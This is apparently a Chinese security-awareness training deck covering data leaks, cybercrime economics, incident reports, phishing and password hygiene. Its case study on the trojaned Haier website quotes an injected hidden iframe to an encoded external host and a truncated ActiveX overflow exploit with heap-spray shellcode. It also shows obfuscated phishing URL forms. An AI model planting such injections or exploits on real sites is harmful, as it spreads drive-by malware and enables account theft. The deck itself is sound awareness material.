隧道安全质量

信息安全意识培养千里之堤，溃于蚁穴寻常的一天7:008:009:0010:0012:0013:0014:0017:0018:0020:0022:00Zzzzzz..不再“寻常”的一天7:008:009:0010:0012:0013:0014:0017:0018:0020:0022:00Zzzzzz..消费者食品安全三聚氰胺成分添加方式危害企业产品质量产业畸形发展“地下”产业链“变化”一组数据2008年浏览器及插件漏洞：237Google的Web爬行软件在数十亿个Web地址进行了检测，搜索试图攻击其访问者的恶意网页。Google发现了300多万个挂马网页，这意味着每1000个网页中约有1个是挂马网页4%的恶意行为集中于财富100强企业中国和北京分别是拥有僵尸主机最多的国家和城市，分别为29%和7%钓鱼：79%针对金融网站，而42%的攻击全部都是基于3个最有名钓鱼工具包64%的地下经济服务器扎根于美国，主要交易商品为信用卡信息安全高频词1契子3看漫画养成安全习惯2从“信息泄漏”到黑客产业链——每天进步一点点，安全进步一大步案例一Internet政工班培训黑客小刘…..办公内网某机关案例二某大学董教授Internet别墅黑客典型的“轮渡”木马AutoRun.Infsys.exeInternetB电脑A电脑典型的“灰鸽子”木马攻击者Internet普通用户因为“娱乐”

而产生安全问题1-上网分布地点2-出现的威胁2-威胁原因网游运营商目前的重视程度还不够用户自身的不良“娱乐”习惯助纣为虐

混合上网地点的巨大威胁感染示意图1.从信任伙伴收到“恶意”信息2.点击链接，打开浏览器3.恶意站点访问4.终端感染恶意代码5.恶意代码控制通信软件6.信息进一步扩散。。。黑色地下产业链今天的网络犯罪产业链网络金融犯罪主要以银行、证券为目标“网银大盗”、“证券大盗”农业银行、工商银行、中国银行、中国银联、渣打、汇丰、星展等银行纷纷被假冒去年全球仿冒网站造成的损失金额达1.371亿美元以网络游戏产业链为目标入侵游戏服务器、游戏玩家的终端盗窃游戏装备、点卡等以其它虚拟资源为目标盗窃QQ号盗窃源代码网络黑社会的形成DoS讹诈DoS雇佣军：明码标价逐渐和传统犯罪相结合今天的网络犯罪产业链出来混，迟早是要还的从被攻击者角度出发ADSLMODEMLANGPRSWLAN/802.11CDMA接入方式不同，但各类应用均存在不同类别、不同程度的安全威胁手机信号可能被监听车臣“独立”之父卡尔.杜达耶夫1996年4月22日凌晨4时，俄空军在截获其与战争调节人哈兹布拉托夫之间的手机通信后定位出其藏身位置，发射空地导弹将其击毙。本.拉登的得力助手阿布.祖巴耶达赫祖巴耶达赫因使用手机暴露藏身地而落网。便签可能会泄露的与你相关的信息传统便签电子便签艳照门事件08年最轰动的娱乐圈泄密事件。泄密门事件香港病人、银行客户、市民资料泄密事件深圳孕产妇信息库泄露事件美国Visa信用卡泄密事件上海双龙汽车“泄密门”事件……私密数据需要保护外部人员要严格管理取货送货访客防止推销员顺手牵羊要避免传递信任公共空间防泄密请擦去黑板并将你所有的秘密文件处理掉，工业间谍在你之后预订了这一房间。-----乔布斯计算机临时文件也可能泄密邮件客户端浏览器访问临时文件区201办公室信息安全事件通报时间信息安全事件20100810周某、王某某、聂某某、周某某电脑未锁屏，王某某打开的属于涉密excle表格20100812周某今天两次没有锁屏，已经被提醒罚款20020100813王某某没有锁屏20100817周某再次没锁屏1.利用IM软件等一系列手段引诱企业内部人员访问挂马站点2.利用MS10-002漏洞获得系统权限3.发送带有恶意PDF文档附件的邮件4.利用PDF-0

day获取系统权限5.利用SSL加密通道访问C&C服务器，获取敏感信息6.全球34家高科技企业被波及，大量核心信息资产泄漏刚打开三鹿集团的网站，看被改成“三聚氰胺集团”了

“信息事故”现场网络安全信息与动态周报-2010年第10期最新安全事件--中国一周178个政府网站被攻击此消息的依据是国家互联网应急中心监测结果，工信部称，对这段时间互联网网络安全整体评价为差。中国计算机学会理事吕京建认为，当前我国政府网站大多很脆弱，易受攻击。对于政府网站的攻击者，吕京建认为有几种可能性，一种是有组织的恐怖组织；一种是个别网络黑客得不到引导恶作剧；还有可能是民间的网络部队认为自己没得到重视，借以攻击政府网站希望被注意。“政府网站，尤其是市县一级政府网络还非常脆弱，没有很强的网络维护队伍”，吕京建表示，今后这些问题还会越来越明显。应该尽快建立一个全民网络信息安全体系。中国一周178个政府网站被攻击最新安全事件-20100220央视被黑安全事件-少林寺网站二度被黑20091126黑鹰安全网事件20100208湖北警方摧毁黑客培训网站“黑鹰安全网”

记者今日从湖北省公安厅获悉，湖北警方近日成功摧毁国内规模最大的黑客培训网站“黑鹰安全网”，该网站招收会员逾18万人，向其提供木马程序，“传授”、“交流”非法控制他人计算机的“技巧”。目前，主要犯罪嫌疑人李某、张某被依法逮捕。

去年4月，黄冈市公安局网安支队与麻城市公安局网安大队成功侦破部督“黑色靓点”系列网络攻击案，抓获涉嫌大肆进行网络攻击、诈骗、盗窃和传播计算机病毒、非法控制计算机信息系统等犯罪行为的韩某等6名犯罪嫌疑人。警方发现，其中3人均系“黑鹰安全网”会员，他们长期在该网站学习、交流用于犯罪的网络黑客技术，使用该网站提供的程序实施违法犯罪。据进一步调查，黑鹰安全网是我国规模最大的黑客培训网站，主要通过招收收费会员形式公开传授各种类型黑客技术，并提供数千款木马软件供下载。自2005年开办以来，共招收收费会员12000多人，普通会员达到17万余人，收取会费逾700万元。

经过半年的调查取证和精心准备，2009年11月26日，警方组织50余名警力，分赴浙江温州、安徽黄山、河南漯河、许昌等地，依法对“黑鹰安全网”进行了查封，一举抓获李某等3名主要犯罪嫌疑人,冻结涉案资金170余万元,扣押网站服务器9台、涉案电脑5台、本田(雅阁2.4)小汽车一辆及相关物证、书证，彻底关闭涉案所有网站。

据湖北省公安厅网监总队有关负责人介绍，该案是继2007年破获“熊猫烧香”病毒案后，湖北网警将打击领域从个体向群体的纵深推进，也是《刑法第七修正案》将非法提供黑客工具行为入罪后侦破的第一起典型案例。警方提醒，那些打着网络安全培训的幌子提供黑客程序工具和传授黑客技术的行为都是违法的，必将受到法律的严惩。最新安全事件—中国是黑客攻击受害国政府网站安全事件1、2010政府网站最新安全事件【赛迪网-IT技术报道】2010-2-2春运订票网站火爆黑客紧随数万网站被挂马2010-1-17

票务网站频遭挂马黑客进入"春运"状态2010-1-25

互联网成黑客秀场中国成全球最大受害者。2010-1-4

公安部物证鉴定中心网站遭袭篡改页面2009-11-11

冒牌"福彩官网"藏毒中奖不成反中木马！2、截至2009年12月，中国大陆政府网站被篡改数量各月累计达2765。3、中国互联网络信息中心（CNNIC）《第25次中国互联网络发展状况统计报告》表明：截至2009年12月30日，中国网民规模达到3.84亿人，普及率达到28.9%；中国的域名总量达到16,814,809个，其中域名已有49730个。中国的网站数，即域名注册者在中国境内的网站数（包括在境内接入和境外接入）达到323万个。中国计算机病毒、木马整体情况分析新增计算机病毒、木马数量呈几何级增长。在新增的病毒、木马中，新增木马数为7801911个，占全年新增病毒、木马总数的56.13%；黑客后门类占全年新增病毒、木马总数的21.97%；而网页脚本所占比例从去年的0.8%跃升至5.96%，成为增长速度最快的一类病毒。全国共有69738785台计算机感染病毒，与08年相比增长了40%

海尔网站被挂马海尔：世界第四大白色家电制造商、中国最具价值品牌网友举报海尔集团()官方页面被挂木马挂马<iframewidth='0'height='0'src='http://%**%77%77%2E%38%35%31%37%33%33%2E%63%6E/htm/view.htm?001'></iframe><ifr***width='100'height='100'src='down3/64.htm'></iframe>

<ifr***width='100'height='100'src='down3/vip.htm'></iframe>

<ifr***width='100'height='100'src='down3/webxl.htm'></iframe>IE漏洞（MS06-014、MS07-004）ppstream堆栈溢出暴风影音溢出漏洞Baidubar溢出漏洞……关闭常见安全软件，下载其它木马，窃取用户的QQ账号/网游账号……<iframewidth='0'height='0'src='http://%**%77%77%2E%38%35%31%37%33%33%2E%63%6E/htm/view.htm?001'></iframe><ifr***width='100'height='100'src='down3/64.htm'></iframe>

<ifr***width='100'height='100'src='down3/vip.htm'></iframe>

<ifr***width='100'height='100'src='down3/webxl.htm'></iframe>

关闭常见安全软件，下载其它木马，窃取用户的QQ账号/网游账号……<html>

<objectclassid=“clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB”id=‘target’></object>

<body>

<SCRIPTlanguage=“javascript”>

var

shellcode=unescape(“%u9090%u9090%uEFE9%......”);

。。。。。。

while(buffer.length<4057)buffer+='\x0a\x0a\x0a\x0a';

buffer+='\x0a';

buffer+='\x0a';

buffer+='\x0a';

buffer+='\x0a\x0a\x0a\x0a';

buffer+='\x0a\x0a\x0a\x0a';

target.rawParse(buffer);

</script>

</body>

</html>暴风影音溢出漏洞ppstream堆栈溢出IE漏洞（MS06-014、MS07-004）Baidubar溢出漏洞

……WHATCANWEDO?等级保护：国家电子政务等级保护、国家保密局BMB17-2006号文件中要求政府、涉密单位必须对与涉密敏感信息、业务系统相关的网络行为进行安全审计公安部82号令：明确要求互联网服务提供者和连接到互联网上的企事业单位必须记录、跟踪网络运行状态，监测互联网安全事件萨班斯法案：在美国上市公司必须遵循的“萨班斯(SOX)法案”中的404条款要求对企业内部网络信息系统进行审计评估行业要求：《开展电力行业信息系统安全等级保护定级工作》体系建设：结合ISO27001标准、业界的最佳实践，建立信息安全管理体系（ISMS），并通过体系的有效实施、运作、维护和完善，使风险降低到可以接受的程度合规IT安全管理策略制度流程人员培训考核技术防病毒补丁管理传输加密审计我们要做的工作技术不谈管理

也不谈电子邮件钓鱼案例Step1嵌入超链接指向虚假站点Step2冒牌的ebay钓鱼邮件在“发信人”栏列出的是“S-Harbor@eB”，它指向eBay公司的合法域名，信件中嵌入的链接也指向“eB”，甚至还使用了加密通道(“https:”)。在这些暗示和信件内容的基础上，用户对该信件就会建立一种思想模型，即eBay要求更新用户信息，然后用户就采取行动，点击嵌入的超链接，并认为它指向eBay。钓鱼实例以假乱真，视觉陷阱域名类似姜太公钓鱼，愿者上钩身份伪装

admin@?support@编码

5

http://3532038435

http://0xD286A123DNS劫持+Phishing钓鱼实例“为什么每次登陆都得输入两次账号和密码？”如果你的邮箱里有陌生标题为英文的的邮件，你会如何处理？A打开内容看是否和自己有关B不打开，先预览C回复给对方说明自己不需要D稍微看下标题和发件人就直接删除如果你熟悉的邮件地址发来的包含附件为*.scr,*.exe,*.bat,*.vbs的邮件，你会如何处理？网页浏览开心网外挂木马“开心农夫”、“开心花园之小鬼神偷”在一些开心网外挂捆绑的木马中，传播最疯狂的是一款名为Gh0st的远程控制木马，由于该木马已经开源，黑客可以直接修改木马源代码来对主流杀软“免杀”。鼠标无故移动、摄像头自动开启等都是电脑成为“肉鸡”的典型现象，应尽快使用杀毒软件查杀扫描。与农场游戏相关的各种农场外挂、伴侣、攻略、辅助工具的网页被挂马情况十分严重，日均挂马网页数量都在1000个以上。

山寨开心网清除恶意插件一组统计数据：曾经遇到的问题脚本病毒泛滥，打开即感染注册表修改令普通用户非常头疼暗中自动地安装插件，即使没有恶意也招人反感对话框不停弹出、不厌其烦修改了IE选项，主页被无耻地强制设定为浏览页自动打开了黄色、非法站点的页面，令人尴尬还有......广告窗口赚流量浏览网页时弹出一个接一个的网页，广告行为网络钓鱼在弹出的部分网页的内容会深深抓住用户的好奇心，提供各种各样有吸引力的产品（如透视镜，监听软件，迷魂药等），但一旦有用户购买必将遭遇欺骗，带来不必要的损失。挂木马，传病毒浏览色情网站时，会执行一些黑客精心构造的恶意脚本。如果此时系统存在flash漏洞，office漏洞，IE漏洞，windows系统漏洞，电脑就会自动下载一个脚本下载器，然后这个下载器会下载多种盗号木马，盗取你的网游、QQ、网银的帐号密码，色情网站的经营者就会与黑客分成，传播的木马越多，他们分到的钱也越多。低俗网站三大陷阱IE的安全设置密码能支撑多久？10CharactersNumerals123456789

PasswordClassofAttackLengthCombinationsClassAClassBClassCClassDClassEClassF2100InstantInstantInstantInstantInstantInstant31000InstantInstantInstantInstantInstantInstant410,000InstantInstantInstantInstantInstantInstant5100,00010SecsInstantInstantInstantInstantInstant61Million1½Mins10SecondsInstantInstantInstantInstant710Million17Mins1½Mins1½MinsInstantInstantInstant8100Million2¾Hours17Mins1½Mins10SecondsInstantInstant91000Million28Hours2¾Hours17Mins1½Mins10SecondsInstantMixedAlpha,Numerals&Symbols0123456789AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz<SP>!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~PasswordClassofAttackLengthCombinationsClassAClassBClassCClassDClassEClassF29,216InstantInstantInstantInstantInstantInstant3884,73688½Secs9SecsInstantInstantInstantInstant485Million2¼Hours14Mins1½Mins8½SecsInstantInstant58Billion9½Days22½Hours2¼Hours13½Mins1¼Mins8Secs6782Billion2½Years90Days9Days22Hours2Hours13Mins775Trillion238Years24Years2½Years87Days8½Days20Hours87.2Quadrillion22,875Years2,287Years229Years23Years2¼Years83½Days解决方案口令强度不足口令结构简单口令保存方法不当口令保质期过长不定期更改你的密码。上面LC5破解的例子给我们一个启示：只要有足够的时间，无论多高强度的密码最终都可被破解!所以，不定期更改你的密码很有必要。一般来说密码寿命最好不超过一个月。键盘锁定密码安全绝对不是技术问题，而是意识问题！密码使用推荐使用大写字母、小写字母、数字、特殊符号组成的密码长度大于8个字节不同的账号使用不同的密码不使用敏感字符串，如生日、姓名关联离开时需要锁定计算机央视曝光的海量信息科技网上看到，网站上有联系人的手机号码QQ号码和电子邮箱300万份银行金卡VIP信息1000万份全国女性购物数据等各种各样的信息，在该网站上被公开售卖。个人信息泄露后果MSN蠕虫举例Win32.Smibag这种蠕虫病毒是“Sinmsn”病毒的一个变种通过MSN发送的一个名为“smb.exe”的文件进行传播激活后自动搜索MSN列出的所有联系人地址，向这些地址自动发送文件IM安全问题使用U盘前首先要杀毒U盘病毒传播造成60%企业内网安全问题手机病毒愈演愈烈Nokia7610/S60SIEMENSDoomBoot.ASymbian/蓝牙传输的通用病毒Palm色情网站在手机网络大行其道职能手机安装手机安全工具手机上网主要的网络应用及时通讯MSN、QQ、GTalk等信息浏览IE、Maxthon、FireFox、Opera等邮件收发OE、Outlook、Foxmail等信息查询Google、Baidu等电子商务Taobao、Ebay、卓越网等在线音视频VOD、Real/MediaPlayer等文件共享Emule、BT、文件服务器等网络游戏浩方、QQ、魔兽等还会越来越多…上传下载Netant、CuteFTP、虚拟硬盘等目前这些应用可能出现的安全问题应用存在的问题上传下载病毒木马传播、身份伪造、机密泄漏邮件收发漏洞利用、病毒木马传播及时通讯病毒木马传播、Bot扩散、信息泄漏信息浏览网络欺诈、网页病毒攻击网络游戏外挂问题、身份伪造、账号装备失窃信息查询敏感信息泄漏在线音视频漏洞利用、身份伪造文件共享病毒木马传播、带宽消耗电子商务身份伪造、网络欺诈、账号失窃防病毒软件的应用MicrosoftOnecareBetaKasperskyWindows防火墙WindowsXPSP2开始提供，取代ICF在默认情况下拒绝任何IP数据流，需要用户允许才能接收无法监控、检查和代理外发连接网上银行无线网络每个人需要做什么互联网应用安全终端安全日常工作安全意识养成和制度遵从互联网应用安全三个途径邮件不点击危险附件（包括预览）IM不点击危险链接浏览器不